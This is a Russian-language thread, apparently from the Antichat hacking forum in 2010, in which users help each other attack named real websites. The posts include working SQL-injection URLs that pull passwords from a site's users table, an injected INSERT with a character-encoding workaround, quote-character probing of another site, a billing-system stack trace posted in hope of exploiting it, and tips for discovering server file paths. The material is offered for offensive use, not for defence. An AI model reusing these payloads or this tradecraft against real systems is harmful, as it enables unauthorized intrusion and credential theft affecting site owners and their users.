Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
25.02.2010, 15:01
|
|
Постоянный
Регистрация: 07.11.2007
Сообщений: 392
Провел на форуме:
1325167
Репутация:
100
|
|
Есть иньекция.
Таблицы login and pass я вытащил успешно.
Таблица users
Но при попытке вытащить данные логина и пароля - белый экран или ошибка.
Как обходится этот баг?
_brandmauer-vlz.ru/?b=ph&id=-1+union+select+1,2,3,pass,5,6,7+from+users-- - белый экран
_brandmauer-vlz.ru/?b=ph&id=-1+union+select+1,2,3,pass,5,6,7+from+Users-- - ошибка
|
|
|
25.02.2010, 15:11
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
Код:
http://brandmauer-vlz.ru/?b=ph&id=-1+union+select+1,2,3,count(*),5,6,7+from+users--
0 записей
Последний раз редактировалось Pashkela; 25.02.2010 в 15:25..
|
|
|
|
25.02.2010, 15:30
|
|
Познающий
Регистрация: 17.09.2008
Сообщений: 56
Провел на форуме:
587324
Репутация:
40
|
|
Не хочет в базу писать русские символы.
Это инъекция, так что запрос только такой.
INSERT _cat SET category='0' а дальше можно дописывать
Код:
INSERT _cat SET category='0', 2_category='0', name_cat='Русский', en_name_cat='sd', description='', sort_index='0'
есть какие то варианты туда их запихнуть всетаки)?
Проблему решил!
name_cat=CHAR(0xF6F3E0F6F3E0 USING cp1251)
Последний раз редактировалось FAQ666; 25.02.2010 в 16:25..
|
|
|
|
25.02.2010, 15:46
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
Сообщение от FAQ666
http://www*materinstvo*ru/art/4610'/
хз, подстава какая-то:
Код:
http://www.materinstvo.ru/art/4610'
http://materinstvo.ru/?module=articles&id=4610'
|
|
|
|
25.02.2010, 15:51
|
|
Познающий
Регистрация: 17.09.2008
Сообщений: 56
Провел на форуме:
587324
Репутация:
40
|
|
Хитрюги  |
|
|
|
25.02.2010, 18:49
|
|
Новичок
Регистрация: 06.04.2008
Сообщений: 24
Провел на форуме:
64762
Репутация:
-3
|
|
exception 'ZSecurityException' with message 'Not enough privileges! ' in /opt/appl/ecare/4.0.0_042/public/specific/ZEcareBusinessLogic.php:136 Stack trace: #0 /opt/appl/ecare/4.0.0_042/public/specific/BusinessLogic/GetUnbilledCallsBLHelper.php(55): ZEcareBusinessLogic->validateAllowedMsisdnId(''1' '2'') #1 /opt/appl/ecare/4.0.0_042/ext/Common/ZBusinessLogic.php(58): GetUnbilledCallsBLHelper->checkPrivileges() #2 /opt/appl/ecare/4.0.0_042/public/requests/listUnbilledCalls.php(21): ZBusinessLogic->execute(Array) #3 /opt/appl/ecare/4.0.0_042/public/index.php(56): include_once('/opt/appl/ecare...') #4 {main}
парни при токой ошибке можно чтото намутить?
это от моей мобильной телефонной компании
|
|
|
|
25.02.2010, 18:54
|
|
Участник форума
Регистрация: 18.05.2010
Сообщений: 215
Провел на форуме:
2972711
Репутация:
92
|
|
Сообщение от RuDDicK
'Not enough privileges! ' i
Обычная ошибка....не достаточно прав для входа туды...Англ. стоит иногда учить
|
|
|
|
25.02.2010, 18:58
|
|
Новичок
Регистрация: 06.04.2008
Сообщений: 24
Провел на форуме:
64762
Репутация:
-3
|
|
да нет я это тока шяс заметил насчёт привилегий...
|
|
|
|
25.02.2010, 19:12
|
|
Участник форума
Регистрация: 15.07.2009
Сообщений: 158
Провел на форуме:
698831
Репутация:
34
|
|
как узнать путь до директории сайта на сервере, пути раскрыть короче ?! через текст ошибки в пхп скрипте не получилось...
|
|
|
|
25.02.2010, 19:25
|
|
Постоянный
Регистрация: 18.02.2008
Сообщений: 368
Провел на форуме:
4075418
Репутация:
386
|
|
как узнать путь до директории сайта на сервере, пути раскрыть короче ?! через текст ошибки в пхп скрипте не получилось...
1)найти раскрытие в скрипте
2)попробывать найти логи, конфиги а в них пути (список путей к ним здесь )
3)попробывать найти в кеше поисковиков/веб архиве
4)побегать с бубном и угадать
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
